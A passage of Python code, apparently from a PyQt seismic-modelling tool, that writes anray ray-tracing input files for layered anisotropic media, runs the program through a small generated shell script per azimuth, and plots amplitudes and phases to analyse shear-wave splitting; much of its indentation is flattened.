file.write("/\n")
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s\n' % (2, 4, 10, 10))
else:
file.write('%s %s %s %s\n' % (2, 3, 10, 10))
            # layer 1
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 0))
file.write('%s %s\n' % (0, 0))
            # soil layer
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
            # layer 2
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
            # layer 3
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (2, 2))
#printerplot
file.write('%s %s\n%s %s\n%s %s\n' % (0, 0.5, 0.9, 1.1, 1.9, 2.1))
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (1.9, 2.1))
            # specification of elastic parameters and constant density
            file.write('%s %s\n' % (0, 1))
            # densities
            if self.checkBox_solo.isChecked():
                file.write('%s '% (self.solo_densidade.value() / 1000))
file.write('%s %s\n' % (self.spinBox_p1.value()/1000, self.spinBox_p2.value()/1000))
            if self.checkBox_solo.isChecked():
                file.write('%s %s\n' % (0, 0))
                file.write('%s %s %s\n' % (1, 1, 1)) # homogeneous in x, y, z
                file.write('/\n/\n/\n') # gridlines
                file.write('%s\n%s\n' % ((self.solo_vp.value() / 1000) ** 2, (self.solo_vs.value() / 1000) ** 2)) # squared P- and S-wave velocities
            # isotropic layer
            file.write('%s %s\n' % (0, 0))
            file.write('%s %s %s\n' % (1, 1, 1)) # homogeneous in x, y, z
            file.write('/\n/\n/\n') # gridlines
            file.write('%s\n%s\n' % ((self.spinBox_vp1.value()/1000)**2, (self.spinBox_vs1.value()/1000)**2)) # squared P- and S-wave velocities
            # anisotropic layer
            if self.dn == 0 and self.dt == 0:
                file.write('%s %s\n' % (0, 0))
                file.write('%s %s %s\n' % (1, 1, 1)) # homogeneous in x, y, z
                file.write('/\n/\n/\n') # gridlines
                file.write('%s\n%s\n' % ((self.spinBox_vp2.value() / 1000) ** 2, (self.spinBox_vs2.value() / 1000) ** 2))
            else:
                file.write('%s %s\n' % (1, 0))
                file.write('%s %s %s\n' % (1, 1, 1)) # homogeneous in x, y, z
                file.write('/\n/\n/\n') # gridlines
file.write('%s\n' % (self.c11)) #A11
file.write('%s\n' % (self.c13)) # A12
file.write('%s\n' % (self.c13)) # A13
file.write('%s\n' % (0)) # A14
file.write('%s\n' % (0)) # A15
file.write('%s\n' % (0)) # A16
file.write('%s\n' % (self.c33)) # A22
file.write('%s\n' % (self.c23)) # A23
file.write('%s\n' % (0)) # A24
file.write('%s\n' % (0)) # A25
file.write('%s\n' % (0)) # A26
file.write('%s\n' % (self.c33)) # A33
file.write('%s\n' % (0)) # A34
file.write('%s\n' % (0)) # A35
file.write('%s\n' % (0)) # A36
file.write('%s\n' % (self.c44)) # A44
file.write('%s\n' % (0)) # A45
file.write('%s\n' % (0)) # A46
file.write('%s\n' % (self.c55)) # A55
                file.write('%s\n' % (0)) # A56
file.write('%s\n' % (self.c55)) # A66
#!ICONT,MEP,MOUT,MDIM,METHOD,MREG,ITMAX,IPOL,IPREC,IRAYPL,IPRINT,IAMP,MTRNS,ICOEF,IRT,ILOC,MCOD,MORI
file.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\n' % (1, self.spinBox_ngeo.value(), 1, 1, 0, 1, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1))
#!PROF(1),RMIN,RSTEP,XPRF,YPRF
            if h < 90:
                az_rad = (h/180)*np.pi
            else:
                az_rad = 1.5
            file.write('%s %s %s %s %s\n' % (az_rad, self.spinBox_rmin.value()/1000, self.spinBox_rstep.value()/1000, 10, 10))
#!XSOUR,YSOUR,ZSOUR,TSOUR,DT,AC,REPS,PREPS
file.write('%s %s %s %s %s %s %s %s\n' % (10, 10, 0, 0, 0.04, 0.0001, 0.0005, 0.0005))
#!AMIN, ASTEP, AMAX
file.write('%s %s %s\n' % (-0.3, 0.005, 1.8))
#!BMIN, BSTEP, BMAX
file.write('%s %s %s\n' % (-0.3, 0.005, 1.8))
#!KC, KREF, ((CODE(I, K), K = 1, 2), I = 1, KREF)
file.write('%s %s %s %s %s %s\n' % (1, 2, 1, 3, 1, 1))
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s %s %s %s %s %s %s\n' % (1, 4, 1, 3, 2, 3, 2, 1, 1, 1))
file.write('%s %s\n' % (0, 0))
file.write('%s/' % (0))
file.close()
self.anray_script(h)
    # Function that builds a shell script to run the models and generate the figures
def anray_script(self, azh):
files = open('anray_script%s.sh' %azh, 'w')
files.write('modname=modelo_anray\nanrayinput="$modname"_%s.modelo\n./anray <<FIM\n$anrayinput\nFIM\n\n\n' %(azh))
files.write('cp fort.30 amplitudes_%s.dat\n\n' %azh)
files.write('cp lu2.anray lu2_%s.anray' %azh)
files.close()
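        # The generated anray_script<az>.sh pipes modelo_anray_<az>.modelo into the
        # 'anray' executable via a here-document and then copies fort.30 and lu2.anray
        # to azimuth-tagged file names, which split() reads back later.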
        subprocess.call('chmod +x anray_script%s.sh' %azh, shell=True)
        # anray_thr updates Qt widgets and must finish before the next azimuth,
        # so it is called synchronously here
        self.anray_thr(azh)
    # Function to execute the script and wait for it to finish
def anray_thr(self, azh):
        FNULL = open(os.devnull, 'w')
        cmd = './anray_script%s.sh' %azh
        p = subprocess.Popen(cmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
status = p.wait()
        shutil.copy2('fort.30', '%s/HTI_P_S_model/amplitudes_%s.dat' %(self.anray_path, azh))
        shutil.copy2('lu2.anray', '%s/HTI_P_S_model/lu2_%s.anray' % (self.anray_path, azh))
        shutil.move('modelo_anray_%s.modelo' % azh,'%s/HTI_P_S_model/modelo_anray_%s.modelo' % (self.anray_path, azh))
os.remove('%s/anray_script%s.sh' %(self.anray_path, azh))
self.size = self.size + 10
self.progressBar.setValue(self.size)
if self.progressBar.value() == 100:
self.frame_7.setEnabled(True)
self.frame_8.setEnabled(True)
self.frame_11.setEnabled(True)
self.frame_13.setEnabled(True)
self.sismo_button.setEnabled(True)
self.frame_14.setEnabled(True)
self.frame_9.setEnabled(True)
if self.checkBox_solo.isChecked() == False:
self.checkBox_solo_sismo.setChecked(False)
self.checkBox_solo_sismo2.setChecked(False)
self.checkBox_solo_sismo.setEnabled(False)
self.frame_12.setEnabled(False)
self.label_47.setEnabled(False)
else:
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
self.split()
    # Function that plots the components from the anray output and analyses the splitting
def split(self):
self.axes_anray_tot.cla()
self.axes_anray_tot2.cla()
self.axes_anray_rad.cla()
self.axes_anray_rad2.cla()
self.axes_anray_z.cla()
self.axes_anray_z2.cla()
self.axes_anray_time.cla()
self.axes_anray2_tot.cla()
self.axes_anray2_z.cla()
self.axes_anray2_time.cla()
self.axes_anray2_rad.cla()
f_0 = open('amplitudes_0.dat', "r")
f_30 = open('amplitudes_30.dat', "r")
f_45 = open('amplitudes_45.dat', "r")
f_60 = open('amplitudes_60.dat', "r")
f_90= open('amplitudes_90.dat', "r")
time_basalto = []
time_solo=[]
geofone_0 = []
x_0 = []
y_0 = []
z_0 = []
xc_0 = []
yc_0 = []
zc_0 = []
geofone_30 = []
x_30 = []
y_30 = []
z_30 = []
xc_30 = []
yc_30 = []
zc_30 = []
geofone_45 = []
x_45 = []
y_45 = []
z_45 = []
xc_45 = []
yc_45 = []
zc_45 = []
geofone_60 = []
x_60 = []
y_60 = []
z_60 = []
xc_60 = []
yc_60 = []
zc_60 = []
geofone_90 = []
x_90 = []
y_90 = []
z_90 = []
xc_90 = []
yc_90 = []
zc_90 = []
solo_x_0=[]
solo_x_30=[]
solo_x_45 = []
solo_x_60 = []
solo_x_90 = []
solo_y_0=[]
solo_y_30=[]
solo_y_45 = []
solo_y_60 = []
solo_y_90 = []
solo_z_0=[]
solo_z_30=[]
solo_z_45 = []
solo_z_60 = []
solo_z_90 = []
fase_x_0 = []
fase_x_30 = []
fase_x_45 = []
fase_x_60 = []
fase_x_90 = []
fase_y_0 = []
fase_y_30 = []
fase_y_45 = []
fase_y_60 = []
fase_y_90 = []
fase_z_0 = []
fase_z_30 = []
fase_z_45 = []
fase_z_60 = []
fase_z_90 = []
self.axes_anray_tot.set_ylabel("total")
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray2_tot.grid()
self.axes_anray2_rad.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
if self.checkBox_solo.isChecked():
two_layer = True
var = 2
else:
two_layer = False
var = 1
for line in f_0:
coluna = line.split()
if float(coluna[0]) == var:
geofone_0.append(int(coluna[1]))
                # real part
x_0.append(float(coluna[3]))
y_0.append(float(coluna[5]))
z_0.append(float(coluna[7]))
                # imaginary part
xc_0.append(float(coluna[4]))
yc_0.append(float(coluna[6]))
zc_0.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 2:
time_basalto.append(float(coluna[2]))
else :
time_solo.append(float(coluna[2]))
solo_x_0.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_0.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_0.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_0.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_0.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_0.append(np.arctan2(float(coluna[8]), float(coluna[7])))
if two_layer == False:
time_basalto.append(float(coluna[2]))
f_0.close()
geo_0 = np.asarray(geofone_0)
time_basalto = np.asarray(time_basalto)
time_solo = np.asarray(time_solo)
x_0 = np.asarray(x_0)
y_0 = np.asarray(y_0)
z_0 = np.asarray(z_0)
xc_0 = np.asarray(xc_0)
yc_0 = np.asarray(yc_0)
zc_0 = np.asarray(zc_0)
solo_x_0 = np.asarray(solo_x_0)
solo_x_0 = np.fliplr([solo_x_0])[0]
solo_y_0 = np.asarray(solo_y_0)
solo_y_0 = np.fliplr([solo_y_0])[0]
solo_z_0 = np.asarray(solo_z_0)
solo_z_0 = np.fliplr([solo_z_0])[0]
fase_x_0 = np.asarray(fase_x_0)
fase_x_0 = np.fliplr([fase_x_0])[0]
fase_y_0 = np.asarray(fase_y_0)
fase_y_0 = np.fliplr([fase_y_0])[0]
fase_z_0 = np.asarray(fase_z_0)
fase_z_0 = np.fliplr([fase_z_0])[0]
solo_rad_0 = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2)
self.solo_fase_rad = fase_x_0
self.solo_fase_z = fase_z_0
solo_0_tot = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2 + solo_z_0 ** 2)
self.refl_solo_rad_0 = solo_rad_0
self.refl_solo_z_0 = solo_z_0
self.time_basalto = np.fliplr([time_basalto])[0]
self.time_solo = np.fliplr([time_solo])[0]
x0_re = np.fliplr([x_0])[0]
y0_re = np.fliplr([y_0])[0]
z0_re = np.fliplr([z_0])[0]
x0c_re = np.fliplr([xc_0])[0]
y0c_re = np.fliplr([yc_0])[0]
z0c_re = np.fliplr([zc_0])[0]
ampx_0 = np.sqrt(x0_re**2 + x0c_re**2)
ampy_0 = np.sqrt(y0_re **2 + y0c_re ** 2)
ampz_0 = np.sqrt(z0_re **2 + z0c_re ** 2)
phx_0 = np.arctan2(x0c_re, x0_re)
phy_0 = np.arctan2(y0c_re, y0_re)
phz_0 = np.arctan2(z0c_re, z0_re)
self.hti_fase_rad_0 = phx_0
self.hti_fase_z_0 = phz_0
geo0_re = np.fliplr([geo_0])[0]
tot0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2 + ampz_0 ** 2)
rad_0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2)
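        # ampx/ampy/ampz are the moduli and phx/phy/phz the phases of the complex anray
        # amplitudes (real parts in columns 3/5/7, imaginary parts in columns 4/6/8 of
        # the copied fort.30 file); tot0 and rad_0 are the total and horizontal (radial)
        # magnitudes for azimuth 0.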
self.axes_anray_tot.plot(geo0_re, tot0, label=0)
self.refl_tot_0 = tot0
self.refl_rad_0 = rad_0
self.refl_z_0 = ampz_0
self.axes_anray_z.plot(geo0_re, ampz_0, label=0)
self.axes_anray_rad.plot(geo0_re, rad_0, label=0)
try:
if two_layer==True:
self.axes_anray2_tot.plot(geo0_re, solo_0_tot, label=0)
self.axes_anray2_rad.plot(geo0_re, solo_rad_0, label=0)
self.axes_anray2_z.plot(geo0_re, solo_z_0, label=0)
if two_layer == True:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray2_time.plot(geo0_re, self.time_solo, color='brown')
else:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray_time.set_ylabel('tempo (s)')
self.axes_anray2_time.set_ylabel('tempo (s)')
for line in f_30:
coluna = line.split()
if float(coluna[0]) == var:
geofone_30.append(int(coluna[1]))
x_30.append(float(coluna[3]))
y_30.append(float(coluna[5]))
z_30.append(float(coluna[7]))
xc_30.append(float(coluna[4]))
yc_30.append(float(coluna[6]))
zc_30.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_30.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_30.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_30.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_30.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_30.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_30.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_30.close()
geo_30 = np.asarray(geofone_30)
x_30 = np.asarray(x_30)
y_30 = np.asarray(y_30)
z_30 = np.asarray(z_30)
xc_30 = np.asarray(xc_30)
yc_30 = np.asarray(yc_30)
zc_30 = np.asarray(zc_30)
x30_re = np.fliplr([x_30])[0]
y30_re = np.fliplr([y_30])[0]
z30_re = np.fliplr([z_30])[0]
x30c_re = np.fliplr([xc_30])[0]
y30c_re = np.fliplr([yc_30])[0]
z30c_re = np.fliplr([zc_30])[0]
ampx_30 = np.sqrt(x30_re ** 2 + x30c_re ** 2)
ampy_30 = np.sqrt(y30_re ** 2 + y30c_re ** 2)
ampz_30 = np.sqrt(z30_re ** 2 + z30c_re ** 2)
phx_30 = np.arctan2(x30c_re, x30_re)
phy_30 = np.arctan2(y30c_re, y30_re)
phz_30 = np.arctan2(z30c_re, z30_re)
self.hti_fase_rad_30 = phx_30
self.hti_fase_z_30 = phz_30
geo30_re = np.fliplr([geo_30])[0]
tot30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2 + ampz_30 ** 2)
rad_30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2)
solo_x_30 = np.asarray(solo_x_30)
solo_x_30 = np.fliplr([solo_x_30])[0]
solo_y_30 = np.asarray(solo_y_30)
solo_y_30 = np.fliplr([solo_y_30])[0]
solo_z_30 = np.asarray(solo_z_30)
solo_z_30 = np.fliplr([solo_z_30])[0]
solo_30_tot = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2 + solo_z_30 ** 2)
solo_rad_30 = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2)
fase_x_30 = np.asarray(fase_x_30)
fase_x_30 = np.fliplr([fase_x_30])[0]
fase_y_30 = np.asarray(fase_y_30)
fase_y_30 = np.fliplr([fase_y_30])[0]
fase_z_30 = np.asarray(fase_z_30)
fase_z_30 = np.fliplr([fase_z_30])[0]
self.refl_solo_x_30 = solo_rad_30
self.refl_solo_y_30 = solo_y_30
self.refl_solo_z_30 = solo_z_30
self.refl_tot_30 = tot30
self.refl_rad_30 = rad_30
self.refl_y_30 = y30_re
self.refl_z_30 = ampz_30
self.axes_anray_tot.plot(geo30_re, tot30, label=30)
self.axes_anray_rad.plot(geo30_re, rad_30, label=30)
self.axes_anray_z.plot(geo30_re, ampz_30, label=30)
if two_layer == True:
self.axes_anray2_z.plot(geo30_re, solo_z_30, label=30)
self.axes_anray2_tot.plot(geo30_re, solo_30_tot, label=30)
self.axes_anray2_rad.plot(geo30_re, solo_rad_30, label=30)
for line in f_45:
coluna = line.split()
if float(coluna[0]) == var:
geofone_45.append(int(coluna[1]))
x_45.append(float(coluna[3]))
y_45.append(float(coluna[5]))
z_45.append(float(coluna[7]))
xc_45.append(float(coluna[4]))
yc_45.append(float(coluna[6]))
zc_45.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_45.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_45.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_45.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_45.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_45.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_45.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_45.close()
geo_45 = np.asarray(geofone_45)
x_45 = np.asarray(x_45)
y_45 = np.asarray(y_45)
z_45 = np.asarray(z_45)
xc_45 = np.asarray(xc_45)
yc_45 = np.asarray(yc_45)
zc_45 = np.asarray(zc_45)
x45_re = np.fliplr([x_45])[0]
y45_re = np.fliplr([y_45])[0]
z45_re = np.fliplr([z_45])[0]
x45c_re = np.fliplr([xc_45])[0]
y45c_re = np.fliplr([yc_45])[0]
z45c_re = np.fliplr([zc_45])[0]
ampx_45 = np.sqrt(x45_re ** 2 + x45c_re ** 2)
ampy_45 = np.sqrt(y45_re ** 2 + y45c_re ** 2)
ampz_45 = np.sqrt(z45_re ** 2 + z45c_re ** 2)
phx_45 = np.arctan2(x45c_re, x45_re)
phy_45 = np.arctan2(y45c_re, y45_re)
phz_45 = np.arctan2(z45c_re, z45_re)
self.hti_fase_rad_45 = phx_45
self.hti_fase_z_45 = phz_45
geo45_re = np.fliplr([geo_45])[0]
tot45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2 + ampz_45 ** 2)
rad_45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2)
solo_x_45 = np.asarray(solo_x_45)
solo_x_45 = np.fliplr([solo_x_45])[0]
solo_y_45 = np.asarray(solo_y_45)
solo_y_45 = np.fliplr([solo_y_45])[0]
solo_z_45 = np.asarray(solo_z_45)
solo_z_45 = np.fliplr([solo_z_45])[0]
solo_45_tot = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2 + solo_z_45 ** 2)
solo_rad_45 = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2)
fase_x_45 = np.asarray(fase_x_45)
fase_x_45 = np.fliplr([fase_x_45])[0]
fase_y_45 = np.asarray(fase_y_45)
fase_y_45 = np.fliplr([fase_y_45])[0]
fase_z_45 = np.asarray(fase_z_45)
fase_z_45 = np.fliplr([fase_z_45])[0]
self.refl_solo_x_45 = solo_rad_45
self.refl_solo_y_45 = solo_y_45
self.refl_solo_z_45 = solo_z_45
self.refl_tot_45 = tot45
self.refl_rad_45 = rad_45
self.refl_y_45 = y45_re
self.refl_z_45 = ampz_45
self.axes_anray_tot.plot(geo45_re, tot45, label=45)
self.axes_anray_rad.plot(geo45_re, rad_45, label=45)
self.axes_anray_z.plot(geo45_re, ampz_45, label=45)
if two_layer == True:
self.axes_anray2_z.plot(geo45_re, solo_z_45, label=45)
self.axes_anray2_tot.plot(geo45_re, solo_45_tot, label=45)
self.axes_anray2_rad.plot(geo45_re, solo_rad_45, label=45)
for line in f_60:
coluna = line.split()
if float(coluna[0]) == var:
geofone_60.append(int(coluna[1]))
x_60.append(float(coluna[3]))
y_60.append(float(coluna[5]))
z_60.append(float(coluna[7]))
xc_60.append(float(coluna[4]))
yc_60.append(float(coluna[6]))
zc_60.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_60.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_60.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_60.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_60.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_60.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_60.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_60.close()
geo_60 = np.asarray(geofone_60)
x_60 = np.asarray(x_60)
y_60 = np.asarray(y_60)
z_60 = np.asarray(z_60)
xc_60 = np.asarray(xc_60)
yc_60 = np.asarray(yc_60)
zc_60 = np.asarray(zc_60)
x60_re = np.fliplr([x_60])[0]
y60_re = np.fliplr([y_60])[0]
z60_re = np.fliplr([z_60])[0]
x60c_re = np.fliplr([xc_60])[0]
y60c_re = np.fliplr([yc_60])[0]
z60c_re = np.fliplr([zc_60])[0]
ampx_60 = np.sqrt(x60_re ** 2 + x60c_re ** 2)
ampy_60 = np.sqrt(y60_re ** 2 + y60c_re ** 2)
ampz_60 = np.sqrt(z60_re ** 2 + z60c_re ** 2)
phx_60 = np.arctan2(x60c_re, x60_re)
phy_60 = np.arctan2(y60c_re, y60_re)
phz_60 = np.arctan2(z60c_re, z60_re)
self.hti_fase_rad_60 = phx_60
self.hti_fase_z_60 = phz_60
geo60_re = np.fliplr([geo_60])[0]
tot60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2 + ampz_60 ** 2)
rad_60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2)
solo_x_60 = np.asarray(solo_x_60)
solo_x_60 = np.fliplr([solo_x_60])[0]
solo_y_60 = np.asarray(solo_y_60)
solo_y_60 = np.fliplr([solo_y_60])[0]
solo_z_60 = np.asarray(solo_z_60)
solo_z_60 = np.fliplr([solo_z_60])[0]
solo_60_tot = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2 + solo_z_60 ** 2)
solo_rad_60 = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2)
fase_x_60 = np.asarray(fase_x_60)
fase_x_60 = np.fliplr([fase_x_60])[0]
fase_y_60 = np.asarray(fase_y_60)
fase_y_60 = np.fliplr([fase_y_60])[0]
fase_z_60 = np.asarray(fase_z_60)
fase_z_60 = np.fliplr([fase_z_60])[0]
self.refl_solo_x_60 = solo_rad_60
self.refl_solo_y_60 = solo_y_60
self.refl_solo_z_60 = solo_z_60
self.refl_tot_60 = tot60
self.refl_rad_60 = rad_60
self.refl_y_60 = y60_re
self.refl_z_60 = ampz_60
self.axes_anray_tot.plot(geo60_re, tot60, label=60)
self.axes_anray_rad.plot(geo60_re, rad_60, label=60)
self.axes_anray_z.plot(geo60_re, ampz_60, label=60)
if two_layer == True:
self.axes_anray2_z.plot(geo60_re, solo_z_60, label=60)
self.axes_anray2_tot.plot(geo60_re, solo_60_tot, label=60)
self.axes_anray2_rad.plot(geo60_re, solo_rad_60, label=60)
for line in f_90:
coluna = line.split()
if float(coluna[0]) == var:
geofone_90.append(int(coluna[1]))
x_90.append(float(coluna[3]))
y_90.append(float(coluna[5]))
z_90.append(float(coluna[7]))
xc_90.append(float(coluna[4]))
yc_90.append(float(coluna[6]))
zc_90.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_90.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_90.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_90.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_90.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_90.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_90.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_90.close()
geo_90 = np.asarray(geofone_90)
x_90 = np.asarray(x_90)
y_90 = np.asarray(y_90)
z_90 = np.asarray(z_90)
xc_90 = np.asarray(xc_90)
yc_90 = np.asarray(yc_90)
zc_90 = np.asarray(zc_90)
x90_re = np.fliplr([x_90])[0]
y90_re = np.fliplr([y_90])[0]
z90_re = np.fliplr([z_90])[0]
x90c_re = np.fliplr([xc_90])[0]
y90c_re = np.fliplr([yc_90])[0]
z90c_re = np.fliplr([zc_90])[0]
ampx_90 = np.sqrt(x90_re ** 2 + x90c_re ** 2)
ampy_90 = np.sqrt(y90_re ** 2 + y90c_re ** 2)
ampz_90 = np.sqrt(z90_re ** 2 + z90c_re ** 2)
            phx_90 = np.arctan2(x90c_re, x90_re)
            phy_90 = np.arctan2(y90c_re, y90_re)
            phz_90 = np.arctan2(z90c_re, z90_re)
self.hti_fase_rad_90 = phx_90
self.hti_fase_z_90 = phz_90
geo90_re = np.fliplr([geo_90])[0]
tot90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2 + ampz_90 ** 2)
rad_90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2)
solo_x_90 = np.asarray(solo_x_90)
solo_x_90 = np.fliplr([solo_x_90])[0]
solo_y_90 = np.asarray(solo_y_90)
solo_y_90 = np.fliplr([solo_y_90])[0]
solo_z_90 = np.asarray(solo_z_90)
solo_z_90 = np.fliplr([solo_z_90])[0]
solo_90_tot = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2 + solo_z_90 ** 2)
solo_rad_90 = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2)
fase_x_90 = np.asarray(fase_x_90)
fase_x_90 = np.fliplr([fase_x_90])[0]
fase_y_90 = np.asarray(fase_y_90)
fase_y_90 = np.fliplr([fase_y_90])[0]
fase_z_90 = np.asarray(fase_z_90)
fase_z_90 = np.fliplr([fase_z_90])[0]
self.refl_solo_x_90 = solo_rad_90
self.refl_solo_y_90 = solo_y_90
self.refl_solo_z_90 = solo_z_90
self.refl_tot_90 = tot90
self.refl_rad_90 = rad_90
self.refl_y_90 = y90_re
self.refl_z_90 = ampz_90
self.axes_anray_tot.plot(geo90_re, tot90, label=90)
self.axes_anray_rad.plot(geo90_re, rad_90, label=90)
self.axes_anray_z.plot(geo90_re, ampz_90, label=90)
self.axes_anray_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.5))
if two_layer == True:
self.axes_anray2_z.plot(geo90_re, solo_z_90, label=90)
self.axes_anray2_tot.plot(geo90_re, solo_90_tot, label=90)
self.axes_anray2_rad.plot(geo90_re, solo_rad_90, label=90)
self.axes_anray2_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.4))
if self.split_box_anray_0_90.isChecked():
split_tot = np.zeros(len(geo0_re))
split_rad = np.zeros(len(geo0_re))
split_z = np.zeros(len(geo0_re))
for i in range(len(geo0_re)):
if tot0[i] > tot90[i]:
split_tot[i] = (tot0[i]-tot90[i])/tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
else:
split_tot[i] = (tot90[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
if abs(rad_0[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_0[i])-abs(rad_90[i]))/abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
if abs(ampz_0[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_0[i])-abs(ampz_90[i]))/abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
self.axes_anray_tot2.bar(geo0_re, split_tot, width=0.7, alpha=0.1, color='red')
self.axes_anray_rad2.bar(geo0_re, split_rad, width=0.7, alpha=0.1, color='red')
self.axes_anray_z2.bar(geo0_re, split_z, width=0.7, alpha=0.1, color='red')
if self.split_box_anray_0_45.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot0[i] > tot45[i]:
